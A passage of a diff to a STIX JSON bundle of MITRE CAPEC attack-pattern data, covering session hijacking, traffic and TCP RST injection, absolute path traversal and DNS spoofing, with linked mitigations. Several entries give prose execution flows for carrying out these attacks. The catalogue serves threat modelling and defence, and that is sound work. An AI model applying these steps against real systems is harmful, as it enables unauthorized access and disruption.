"attack-pattern--52b5f7dc-228b-44d5-865a-e4595b227ba2", + "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e" + ], + "x_capec_prerequisites": [ + "An application that leverages a client-side web browser with scripting enabled.", + "An application that fails to adequately sanitize or encode untrusted input.", + "An application that stores information provided by the user in data storage of some kind." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "Requires the ability to write scripts of varying complexity and to inject them through user controlled fields within the application." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--28c01d45-e477-41b8-b923-e1a759ec7c34", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7dc1cd16-6e36-4b01-bee9-f089fc544d5a", + "spec_version": "2.1", + "target_ref": "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e027d6bd-c85f-4585-8bae-468b1e9f5507", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e2d6481d-fb04-45e8-9e24-706eeca3f87d", + "spec_version": "2.1", + "target_ref": "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that all user-supplied input is validated before being stored.", + "id": "course-of-action--00d95d33-0be2-4026-b367-d0b3ca061978", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-592-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fc721152-28b2-4c41-8360-1075efd36665", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--00d95d33-0be2-4026-b367-d0b3ca061978", + "spec_version": "2.1", + "target_ref": "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This type of attack involves an adversary that exploits weaknesses in an application's use of sessions in performing authentication. The adversary is able to steal or manipulate an active session and use it to gain unathorized access to the application.", + "external_references": [ + { + "external_id": "CAPEC-593", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/593.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + }, + { + "description": "Browser Session Hijacking", + "external_id": "T1185", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1185" + }, + { + "description": "Use Alternate Authentication Material:Application Access Token", + "external_id": "T1550.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1550/001" + }, + { + "description": "Remote Service Session Hijacking", + "external_id": "T1563", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1563" + }, + { + "description": "Session hijacking attack", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Session_hijacking_attack" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-603", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/09-Testing_for_Session_Hijacking.html" + } + ], + "id": "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Session Hijacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974", + "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80" + ], + "x_capec_child_of_refs": [ + "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228" + ], + "x_capec_consequences": { + "Availability": [ + "Gain Privileges (A successful attack can enable an adversary to gain unauthorized access to an application.)" + ], + "Confidentiality": [ + "Gain Privileges (A successful attack can enable an adversary to gain unauthorized access to an application.)" + ], + "Integrity": [ + "Gain Privileges (A successful attack can enable an adversary to gain unauthorized access to an application.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Discover Existing Session Token: Through varrying means, an adversary will discover and store an existing session token for some other authenticated user session.

Experiment

  1. Insert Found Session Token: The attacker attempts to insert a found session token into communication with the targeted application to confirm viability for exploitation.

Exploit

  1. Session Token Exploitation: The attacker leverages the captured session token to interact with the targeted application in a malicious fashion, impersonating the victim.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--6a99b39b-b14a-4617-8aeb-bce85979f520", + "attack-pattern--f14acee3-770c-4154-a9b2-9eda908c6a9f", + "attack-pattern--a15ef978-f79c-4a64-8c63-8ab413d42b0f", + "attack-pattern--c1e3e934-5b43-4af9-b92b-9a4837a90c14" + ], + "x_capec_prerequisites": [ + "An application that leverages sessions to perform authentication." + ], + "x_capec_resources_required": [ + "The adversary must have the ability to communicate with the application over the network." + ], + "x_capec_skills_required": { + "Low": "Exploiting a poorly protected identity token is a well understood attack with many helpful resources available." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Properly encrypt and sign identity tokens in transit, and use industry standard session key generation mechanisms that utilize high amount of entropy to generate the session key. Many standard web and application servers will perform this task on your behalf. Utilize a session timeout for all sessions. If the user does not explicitly logout, terminate their session after this period of inactivity. If the user logs back in then a new session key should be generated.", + "id": "course-of-action--c731b443-09c9-4d03-bdc2-a9053ce6ea90", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-593-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b99d4053-f452-4a85-b020-ad0868cb52cf", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c731b443-09c9-4d03-bdc2-a9053ce6ea90", + "spec_version": "2.1", + "target_ref": "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-03T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary injects traffic into the target's network connection. The adversary is therefore able to degrade or disrupt the connection, and potentially modify the content. This is not a flooding attack, as the adversary is not focusing on exhausting resources. Instead, the adversary is crafting a specific input to affect the system in a particular way.", + "external_references": [ + { + "external_id": "CAPEC-594", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/594.html" + }, + { + "external_id": "CWE-940", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/940.html" + } + ], + "id": "attack-pattern--6a7fbe0a-080e-4f8b-854d-1d959dbeab8e", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Traffic Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (The injection of specific content into a connection can trigger a disruption in that communications channel, thereby denying availability of the service.)" + ], + "Integrity": [ + "Other (An adversary's injection of additional content into a communication channel negatively impacts the integrity of that channel.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--e6f6d082-2186-4008-b52f-91f67abdba90" + ], + "x_capec_prerequisites": [ + "The target application must leverage an open communications channel.", + "The channel on which the target communicates must be vulnerable to interception (e.g., adversary in the middle attack - CAPEC-94)." + ], + "x_capec_resources_required": [ + "A tool, such as a MITM Proxy, that is capable of generating and injecting custom inputs to be used in the attack." + ], + "x_capec_status": "Stable", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack pattern, an adversary injects a connection reset packet to one or both ends of a target's connection. The attacker is therefore able to have the target and/or the destination server sever the connection without having to directly filter the traffic between them.", + "external_references": [ + { + "external_id": "CAPEC-595", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/595.html" + }, + { + "external_id": "CWE-940", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/940.html" + } + ], + "id": "attack-pattern--e6f6d082-2186-4008-b52f-91f67abdba90", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Connection Reset", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6a7fbe0a-080e-4f8b-854d-1d959dbeab8e" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--dfd75d4a-689b-4cbd-9013-4ed32713dc64" + ], + "x_capec_prerequisites": [ + "This attack requires the ability to monitor the target's network connection." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-03T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary injects one or more TCP RST packets to a target after the target has made a HTTP GET request. The goal of this attack is to have the target and/or destination web server terminate the TCP connection.", + "external_references": [ + { + "external_id": "CAPEC-596", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/596.html" + }, + { + "external_id": "CWE-940", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/940.html" + }, + { + "description": "John-Paul Verkamp, Minaxi Gupta, Inferring Mechanics of Web Censorship Around the World, 2012, USENIX", + "external_id": "REF-477", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--dfd75d4a-689b-4cbd-9013-4ed32713dc64", + "modified": "2019-04-04T00:00:00.000Z", + "name": "TCP RST Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e6f6d082-2186-4008-b52f-91f67abdba90" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "An On/In Path Device" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary with access to file system resources, either directly or via application logic, will use various file absolute paths and navigation mechanisms such as \"..\" to extend their range of access to inappropriate areas of the file system. The goal of the adversary is to access directories and files that are intended to be restricted from their access.", + "external_references": [ + { + "external_id": "CAPEC-597", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/597.html" + }, + { + "external_id": "CWE-36", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/36.html" + } + ], + "id": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Absolute Path Traversal", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Unreliable Execution (The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software.)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Read Data (The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Modify Data (The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Fingerprinting of the operating system: In order to perform a valid path traversal, the adversary needs to know what the underlying OS is so that the proper file seperator is used.

    2. Techniques
    Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.
    TCP/IP Fingerprinting. The adversary uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.
    Induce errors to find informative error messages

  2. Survey application: Using manual or automated means, an adversary will survey the target application looking for all areas where user input is taken to specify a file name or path.

    3. Techniques
    Use a spidering tool to follow and record all links on a web page. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of a web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.
    Use a browser to manually explore a website and analyze how it is constructed. Many browser's plug-in are available to facilitate the analysis or automate the URL discovery.

Experiment

  1. Attempt variations on input parameters: Using manual or automated means, an adversary attempts varying absolute file paths on all found user input locations and observes the responses.

    2. Techniques
    Access common files in root directories such as \"/bin\", \"/boot\", \"/lib\", or \"/home\"
    Access a specific drive letter or windows volume letter by specifying \"C:dirname\" for example
    Access a known Windows UNC share by specifying \"\\\\UNC\\share\\name\" for example

Exploit

  1. Access, modify, or execute arbitrary files.: An adversary injects absolute path traversal syntax into identified vulnerable inputs to cause inappropriate reading, writing or execution of files. An adversary could be able to read directories or files which they are normally not allowed to read. The adversary could also access data outside the web document root, or include scripts, source code and other kinds of files from external websites. Once the adversary accesses arbitrary files, they could also modify files. In particular situations, the adversary could also execute arbitrary code or system commands.

    2. Techniques
    Manipulate file and its path by injecting absolute path sequences (e.g. \"/home/file.txt\").
    Download files, modify files, or try to execute shell commands (with binary files).
", + "x_capec_prerequisites": [ + "The target must leverage and access an underlying file system." + ], + "x_capec_resources_required": [ + "The attacker must have access to an application interface or a direct shell that allows them to inject directory strings and monitor the results." + ], + "x_capec_skills_required": { + "Low": "Simple command line attacks.", + "Medium": "Programming attacks." + }, + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cd5a0b68-7c46-4210-afeb-a383890ba931", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--49faa4e3-77fa-4b56-8186-be9d4302e09a", + "spec_version": "2.1", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3a5fb6c7-5605-48a4-b2ca-bcfff3e93226", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--10e0bdfb-cc84-4788-8d10-225b6e61f135", + "spec_version": "2.1", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--01a4f9a4-8d52-4cd3-a2e0-11eee4192954", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--59bcc683-a1e5-4b88-9821-ddb734003114", + "spec_version": "2.1", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--083f46f3-7384-4987-a5d7-3b3b3c58e717", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6a928417-72f9-4429-951c-8dcaca5edc6d", + "spec_version": "2.1", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ea68faae-9ff5-4a52-a520-135a612e4458", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--da440d05-dc0e-4bfa-8490-7178ae419336", + "spec_version": "2.1", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--70fb8b30-3f7c-41ef-a691-34c163c6e04b", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--16c78c78-dace-4fe3-ac4a-aaf188d14af5", + "spec_version": "2.1", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aa408ca1-01a2-404d-a24a-90d14b0fcdbe", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3c433a52-7784-4abd-b404-41fc8a423886", + "spec_version": "2.1", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ce2dd07c-e915-4e7b-90b5-8af1442e1aae", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b3379e8f-995d-4df7-be15-7861c104b55c", + "spec_version": "2.1", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ff83398b-e67f-4c7c-be17-3abbb20aa2d9", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8fb32cf0-80fd-4e8b-91c6-0908041d5b6e", + "spec_version": "2.1", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8d22787d-6e79-4bd5-8fb5-a6b95e74fc40", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f972cf8f-5c89-4e6c-87ad-8eb40c32883b", + "spec_version": "2.1", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--571be573-775a-4c2e-b74d-01d1a1a56a8a", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4dc38767-be73-424a-b909-90eb4773dfa3", + "spec_version": "2.1", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Validate user input by only accepting known good. Ensure all content that is delivered to client is sanitized against an acceptable content specification using an allowlist approach.", + "id": "course-of-action--b994128b-dfc1-41e0-97a5-e9ec2c1056ee", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-597-11", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d4be0c7a-12b3-47bb-9012-e6800e680e58", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b994128b-dfc1-41e0-97a5-e9ec2c1056ee", + "spec_version": "2.1", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary sends a malicious (\"NXDOMAIN\" (\"No such domain\") code, or DNS A record) response to a target's route request before a legitimate resolver can. This technique requires an On-path or In-path device that can monitor and respond to the target's DNS requests. This attack differs from BGP Tampering in that it directly responds to requests made by the target instead of polluting the routing the target's infrastructure uses.", + "external_references": [ + { + "external_id": "CAPEC-598", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/598.html" + }, + { + "description": "John-Paul Verkamp, Minaxi Gupta, Inferring Mechanics of Web Censorship Around the World, 2012, USENIX", + "external_id": "REF-477", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Anonymous, Towards a Comprehensive Picture of the Great Firewall's DNS Censorship, 2014, USENIX", + "external_id": "REF-479", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--ed79989c-6824-4b9d-912d-8d1fffe93715", + "modified": "2023-01-24T00:00:00.000Z", + "name": "DNS Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Below-Recursive DNS Poisoning: When an On/In-path device between a recursive DNS server and a user sends a malicious (\"NXDOMAIN\" (\"No such domain\") code, or DNS A record ) response before a legitimate resolver can.", + "Above-Recursive DNS Poisoning: When an On/In-path device between an authority server (e.g., government-managed) and a recursive DNS server sends a malicious (\"NXDOMAIN\" (\"No such domain\")code, or a DNS record) response before a legitimate resolver can." + ], + "x_capec_prerequisites": [ + "On/In Path Device" + ], + "x_capec_skills_required": { + "Low": "To distribute email" + }, + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Avoid dependence on DNS", + "id": "course-of-action--818958f8-e5a6-4522-9a89-e48271100548", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-598-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ae2e6105-d7fc-4e98-9dea-4493606440c6", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--818958f8-e5a6-4522-9a89-e48271100548", + "spec_version": "2.1", + "target_ref": "attack-pattern--ed79989c-6824-4b9d-912d-8d1fffe93715", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Include \"hosts file\"/IP address in the application", + "id": "course-of-action--0a399b26-688b-4a78-8d74-4d815dbc37ad", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-598-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5fbf3499-e8c7-452e-87c7-9bd2e4733100", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0a399b26-688b-4a78-8d74-4d815dbc37ad", + "spec_version": "2.1", + "target_ref": "attack-pattern--ed79989c-6824-4b9d-912d-8d1fffe93715", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Utilize a .onion domain with Tor support", + "id": "course-of-action--ec56aac0-0a2d-4aad-b6c5-8afa9f5806f2", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-598-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3f5c44bc-4c83-4819-add3-4fc2f11b2fde", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ec56aac0-0a2d-4aad-b6c5-8afa9f5806f2", + "spec_version": "2.1", + "target_ref": 